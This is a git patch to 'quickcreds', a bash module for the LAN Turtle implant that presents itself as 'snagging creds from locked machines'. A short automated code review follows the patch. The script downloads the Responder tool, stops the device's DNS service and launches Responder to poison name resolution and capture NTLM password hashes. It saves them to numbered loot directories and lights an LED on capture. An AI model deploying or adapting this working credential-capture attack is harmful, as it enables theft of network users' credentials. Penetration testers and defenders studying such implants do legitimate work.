From 1452617da4138203f62304dfbb8793cca36803c7 Mon Sep 17 00:00:00 2001 From: Theo Date: Fri, 9 Apr 2021 23:49:35 +0200 Subject: [PATCH] Fixed quickcreds with new responder size. (#43) * Fixed quickcreds with new responder size. Forces use of SD card amongst some other small fixes. * corrected fixes * remove comments * fixed indexing * Fixed indexing * QuickCreds: Remove all trailing whitespace, fix indentation, drop unwanted comments * Removed odd comment Co-authored-by: Marc Egerton --- modules/quickcreds | 274 ++++++++++++++++++++++++--------------------- 1 file changed, 148 insertions(+), 126 deletions(-) diff --git a/modules/quickcreds b/modules/quickcreds index 9081c72..5e3d064 100644 --- a/modules/quickcreds +++ b/modules/quickcreds @@ -1,8 +1,9 @@ #!/bin/bash /usr/lib/turtle/turtle_module -VERSION="1.3" -DESCRIPTION="Snagging creds from locked machines --Mubix, Room362.com. Implements responder attack and saves creds to numbered directories in /root/loot. LED will blink while QuickCreds is running. Upon capture of NTLM hash the amber LED will light solid. Author: Hak5Darren. Credit: Mubix." +VERSION="1.4" +DESCRIPTION="Snagging creds from locked machines --Mubix, Room362.com. Implements responder attack and saves creds to numbered directories in /root/loot. LED will blink while QuickCreds is running. Upon capture of NTLM hash the LED will light solid. Author: Hak5Darren. Credit: Mubix." CONF=/tmp/QuickCreds.form +# All "dialog" functionality is related to the Turtle shell : ${DIALOG_OK=0} : ${DIALOG_CANCEL=1} : ${DIALOG_HELP=2} 
@@ -10,139 +11,160 @@ CONF=/tmp/QuickCreds.form : ${DIALOG_ITEM_HELP=4} : ${DIALOG_ESC=255} +LOOTDIR="/root/loot/quickcreds/" +RESPLOG=$LOOTDIR"responder.log" +RESPROOT="/sd" +RESPTEMPDL="/tmp/ResponderDownload/" +RESPURL="https://github.com/lgandx/Responder/archive/master.zip" +RESPLOGDIR=$RESPROOT/"Responder/logs" +SLEEPTIMER="1" + function configure { -# dialog --title "QuickCreds" --msgbox "\n\ -# Dependencies will be installed. An Internet connection is required.\n\ -# Upon configuration creds will be saved to /root/loot/ on boot." 9 72 - -dialog --title "QuickCreds" \ ---yesno "\nInstall dependencies and configure QuickCreds?\n\ -An Internet connection is required for installation.\n" 8 60 -response=$? -case $response in - 0) ;; - 1) exit ;; - 255) exit ;; -esac - -# Check to see if QuickCreds has already been configured -if [[ -d /root/loot || -s /root/loot/responder.log ]]; -then - dialog --title "QuickCreds" --msgbox "\nThe QuickCreds module is already configured.\n\ -Creds are saved to /root/loot.\nEnable this module to attack on boot." 9 72 - exit 1 -fi - -# Check for Internet connection -ping -q -w 5 -c 1 lanturtle.com &> /dev/null && { - : -} || { - dialog --title "QuickCreds" --msgbox "\n\ -The LAN Turtle is currently offline.\nPlease connect the LAN Turtle to the Internet and try again. " 9 72 - exit 1 -} - -# Install dependencies -opkg update | dialog --progressbox "Updating opkg" 14 72 - -if [[ ! $(opkg list-installed | grep python-sqlite3) ]]; - then - opkg install python-sqlite3 | dialog --progressbox "Installing dependency python-sqlite3" 14 72 -fi - -if [[ ! $(opkg list-installed | grep screen) ]]; - then - opkg install screen | dialog --progressbox "Installing dependency screen" 14 72 -fi - -if [[ ! $(opkg list-installed | grep python-openssl) ]]; - then - opkg install python-openssl | dialog --progressbox "Installing dependency python-openssl" 14 72 -fi - -if [[ ! 
$(opkg list-installed | grep coreutils-sleep) ]]; - then - opkg install coreutils-sleep | dialog --progressbox "Installing dependency coreutils-sleep" 14 72 -fi - -if [[ ! -d /etc/turtle/Responder || ! -s /etc/turtle/Responder/Responder.py ]]; -then - rm -rf /etc/turtle/Responder - rm -rf /tmp/v2.3.3.5.tar.gz* - wget --progress=dot https://github.com/lgandx/Responder/archive/v2.3.3.5.tar.gz -P /tmp 2>&1 | dialog --progressbox "Download dependency responder" 14 72 - mkdir /etc/turtle/Responder - tar xzf /tmp/v2.3.3.5.tar.gz -C /etc/turtle/Responder 2>&1 | dialog --progressbox "Install dependency responder" 14 72 - rm -rf /tmp/v2.3.3.5.tar.gz* -fi - -# Setup loot directory and complete setup -mkdir /root/loot -touch /root/loot/responder.log - - dialog --title "QuickCreds" --msgbox "\n\ -Configuration complete. Creds will be saved to /root/loot\n\ -Enable this module to have it start the attack on boot.\n" 9 72 -} - -function start { -# Stop on-off-on DHCP blink pattern script -echo "Stopping DHCP Detect Blink Script" -/etc/init.d/dhcp_detect stop -echo "" -echo "QuickCreds started." -echo "LED will blink rapidly while QuickCreds is running." -echo "LED will light solid upon NTLM hash capture." -echo "" -echo "If starting this module from the Turtle Shell menu," -echo "press CTRL+C to return." - -echo "Starting attack..." 
>> /root/loot/responder.log - -# Create new numbered loot directory and symlink it from Responder logs -cd /root/loot -dircount=$(ls -lad /root/loot/* | wc -l) -mkdir /root/loot/$((dircount)) -# Delete all current Responder logs -rm -rf /etc/turtle/Responder/logs -ln -s /root/loot/$((dircount)) /etc/turtle/Responder/logs - -# Stop dnsmasq -/etc/init.d/dnsmasq stop 1&> /dev/null - -# Execute attack -screen -dmS responder bash -c 'cd /etc/turtle/Responder; python Responder.py -I br-lan -w -r -d -P' - -# Blink upon hash capture -while true; do -# Grep for user creds and do not match on machine creds, machine usernames end in $ -if [ $(grep -v '\$:' /etc/turtle/Responder/logs/*NTLM* 2>/dev/null) ]; - then - if [[ ! $(cat /root/loot/responder.log | tail -n1) == *"Creds"* ]] - then - echo "Creds saved!" >> /root/loot/responder.log -#copy all responder logs to loot directory - cp /etc/turtle/Responder/logs/* /root/loot/$((dircount)) - finished + # If SD card is mounted continue if not fail due to not enough space. + if grep -qs $RESPROOT /proc/mounts; then + /bin/echo "SD card is mounted." + else + /usr/bin/dialog --title "QuickCreds" --msgbox "An SD card is required to install this module." 9 72 + exit 1 fi -fi - echo 255 > /sys/class/leds/turtle\:yellow\:system/brightness 2>&1 - sleep 1 - echo 0 > /sys/class/leds/turtle\:yellow\:system/brightness 2>&1 - sleep 1 -done + + # Ask if the user really wants to install the module and its dependencies + /usr/bin/dialog --title "QuickCreds" --yesno "\nInstall dependencies and configure QuickCreds?\nAn Internet connection is required for installation.\n" 8 60 + response=$? + case $response in + 0) ;; + 1) exit ;; + 255) exit ;; + esac + + # Check to see if QuickCreds has already been configured + if [[ -d "$LOOTDIR" || -s "$RESPLOG" ]]; then + /usr/bin/dialog --title "QuickCreds" --msgbox "\nThe QuickCreds module is already configured.\nCreds are saved to $LOOTDIR.\nEnable this module to attack on boot." 
9 72 + exit 1 + fi + + # Check for Internet connection + /bin/ping -q -w 5 -c 1 www.google.com &> /dev/null && { + : + } || { + /usr/bin/dialog --title "QuickCreds" --msgbox "\nThe LAN Turtle is currently offline.\nPlease connect the LAN Turtle to the Internet and try again." 9 72 + exit 1 + } + + # Install dependencies + /bin/opkg update | /usr/bin/dialog --progressbox "Updating opkg" 14 72 + + if [[ ! $(/bin/opkg list-installed | /bin/grep python-sqlite3) ]]; then + /bin/opkg install python-sqlite3 | /usr/bin/dialog --progressbox "Installing dependency python-sqlite3" 14 72 + fi + + if [[ ! $(/bin/opkg list-installed | /bin/grep screen) ]]; then + /bin/opkg install screen | /usr/bin/dialog --progressbox "Installing dependency screen" 14 72 + fi + + if [[ ! $(/bin/opkg list-installed | /bin/grep python-openssl) ]]; then + /bin/opkg install python-openssl | /usr/bin/dialog --progressbox "Installing dependency python-openssl" 14 72 + fi + + if [[ ! $(/bin/opkg list-installed | /bin/grep coreutils-sleep) ]]; then + /bin/opkg install coreutils-sleep | /usr/bin/dialog --progressbox "Installing dependency coreutils-sleep" 14 72 + fi + + if [[ ! $(/bin/opkg list-installed | /bin/grep unzip) ]]; then + /bin/opkg install unzip | /usr/bin/dialog --progressbox "Installing dependency unzip" 14 72 + fi + + # Check if Responder is installed (not the module available in the Turtle "GUI", but the tool taken straight from GitHub) + if [[ ! -d "$RESPROOT" || ! 
-s "$RESPROOT"Responder.py ]]; then + # Clean up + /bin/rm -rf "$RESPROOT"Responder/ + /bin/rm -rf "$RESPTEMPDL"master.zip* + # Create new + /bin/mkdir -p "$RESPTEMPDL" + # Download and extract + /usr/bin/wget --progress=dot "$RESPURL" -P "$RESPTEMPDL" 2>&1 | /usr/bin/dialog --progressbox "Download dependency responder" 14 72 + # Unpack the GitHub download + /usr/bin/unzip "$RESPTEMPDL"master.zip -d "$RESPTEMPDL" 2>&1 | /usr/bin/dialog --progressbox "Unpacking dependency responder" 14 72 + /bin/rm "$RESPTEMPDL"Responder-master/tools/MultiRelay/bin/*.exe + /bin/mv "$RESPTEMPDL"Responder-master "$RESPTEMPDL"Responder + /bin/mv "$RESPTEMPDL"Responder "$RESPROOT" + /bin/rm -rf "$RESPTEMPDL"master.zip* + fi + + # Setup loot directory and complete setup + /bin/mkdir -p "$LOOTDIR" + + /usr/bin/dialog --title "QuickCreds" --msgbox "\nConfiguration complete. Creds will be saved to $LOOTDIR\nEnable this module to have it start the attack on boot.\n" 9 72 } function finished { - echo 255 > /sys/class/leds/turtle\:yellow\:system/brightness 2>&1 - exit + /bin/echo 255 > /sys/class/leds/lan-turtle\:orange\:system/brightness 2>&1 + /bin/sync + exit +} + +function start { + # Stop on-off-on DHCP blink pattern script, this is what causes the "Terminated" text to appear if running QuickCreds from within the Turtle module system in the Turtle "GUI" + /bin/echo "Stopping DHCP Detect Blink Script" + /etc/init.d/dhcp_detect stop + /bin/echo "" + /bin/echo "QuickCreds started." + /bin/echo "The orange LED will blink while QuickCreds is running." + /bin/echo "The orange LED will turn solid upon NTLM hash capture." + /bin/echo "" + /bin/echo "If starting this module from the Turtle Shell menu," + /bin/echo "press CTRL+C to return." 
+ + # Create new numbered loot directory and symlink it from Responder logs + /bin/mkdir -p $LOOTDIR + cd $LOOTDIR + dircount=$(/bin/ls -lad $LOOTDIR/* | /usr/bin/wc -l) + # Adjust the number when creating the numbered lootdir for this session, if no existing dirs (i.e. wc -l = 0) then start with 1 instead of 0 otherwise there will be a gap between 0 and 2 + if [[ $((dircount)) == 0 ]]; then dircount=1 ; fi + /bin/mkdir $LOOTDIR"Creds"$((dircount)) + # Delete all current Responder logs + /bin/rm -rf $RESPLOGDIR + /bin/ln -s $LOOTDIR"Creds"$((dircount)) $RESPLOGDIR + + # Saving interface info, surplus information and can be deleted + /sbin/ifconfig > $LOOTDIR"Creds"$((dircount))/ifconfig_dump.log + + /bin/echo "Creds$((dircount)) - Initiating Responder attack..." >> $RESPLOG + + # Stop dnsmasq + /bin/echo "Creds$((dircount)) - Stopping dnsmasq" >> $RESPLOG + /etc/init.d/dnsmasq stop 1&> /dev/null + + # Execute attack + /bin/echo "Creds$((dircount)) - Starting screen and Responder" >> $RESPLOG + /usr/sbin/screen -dmS responder /bin/bash -c 'cd /sd/Responder; /usr/bin/python /sd/Responder/Responder.py -I eth0 -w -r -d -P' + + /bin/echo "Creds$((dircount)) - LED blink pattern during attack enabled" >> $RESPLOG + # Blink upon hash capture + while true; do + # Grep for user creds and do not match on machine creds, machine usernames end in $ + if [[ $(/bin/grep -v '\$:' $RESPLOGDIR/*NTLM* 2>/dev/null) ]]; then + /bin/echo "Creds$((dircount)) - Found user creds NTLM file in the logs directory!" 
>> $RESPLOG + /bin/echo "Creds$((dircount)) - Creds obtained and saved" >> $RESPLOG + #Copy all responder logs to loot directory + /bin/echo "Creds$((dircount)) - Copying the Responder native logs to loot directory" >> $RESPLOG + /bin/cp $RESPLOGDIR/* $LOOTDIR"Creds"$((dircount)) + /bin/echo "Creds$((dircount)) - Calling the finished function" >> $RESPLOG + finished + fi + /bin/echo 255 > /sys/class/leds/lan-turtle\:orange\:system/brightness 2>&1 + /bin/sleep $SLEEPTIMER + /bin/echo 0 > /sys/class/leds/lan-turtle\:orange\:system/brightness 2>&1 + /bin/sleep $SLEEPTIMER + done } function stop { - kill $(ps | grep [R]esponder | awk {'print $1'}) - /etc/init.d/dnsmasq start 1&> /dev/null - echo "QuickCreds Stopped" + /bin/kill $(/bin/ps | /bin/grep [R]esponder | /usr/bin/awk {'print $1'}) + /etc/init.d/dnsmasq start 1&> /dev/null + /bin/echo "QuickCreds Stopped" } function status { - if ps | grep -w -q [R]esponder.py; then echo "1"; else echo "0"; fi + if [[ $(/bin/ps | /bin/grep -w [R]esponder.py) ]]; then /bin/echo "1"; else /bin/echo "0"; fi }
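Review bot: The Responder presence check at the top of the install branch in configure tests the wrong paths — with `RESPROOT="/sd"` the expression `! -d "$RESPROOT" || ! -s "$RESPROOT"Responder.py` looks at the SD mountpoint and at `/sdResponder.py`, so it is true on every run and Responder is deleted and re-downloaded each time configure is invoked, even though the install block and the `screen` command in start both use `/sd/Responder/Responder.py`. The condition should read `if [[ ! -d "$RESPROOT"/Responder || ! -s "$RESPROOT"/Responder/Responder.py ]]; then`. Separately, replacing the pinned v2.3.3.5 tarball with `archive/master.zip` means an unversioned, unverified archive is fetched and executed on the device on every (re)install; pinning a release tag in `RESPURL` and comparing the download against a known digest (e.g. `echo "<EXPECTED_SHA256>  ${RESPTEMPDL}master.zip" | sha256sum -c` before the unzip, placeholder value) would keep the install reproducible and detect a tampered or changed artifact. The unquoted `$LOOTDIR`/`$RESPLOGDIR` expansions in start and the `ls ... | wc -l` directory count are fragile under `set -u`/spaces and inflate the count with `responder.log`; at minimum quote them (`"$LOOTDIR"`, `"$RESPLOGDIR"`) so the `rm -rf` and `ln -s` lines cannot act on the wrong path.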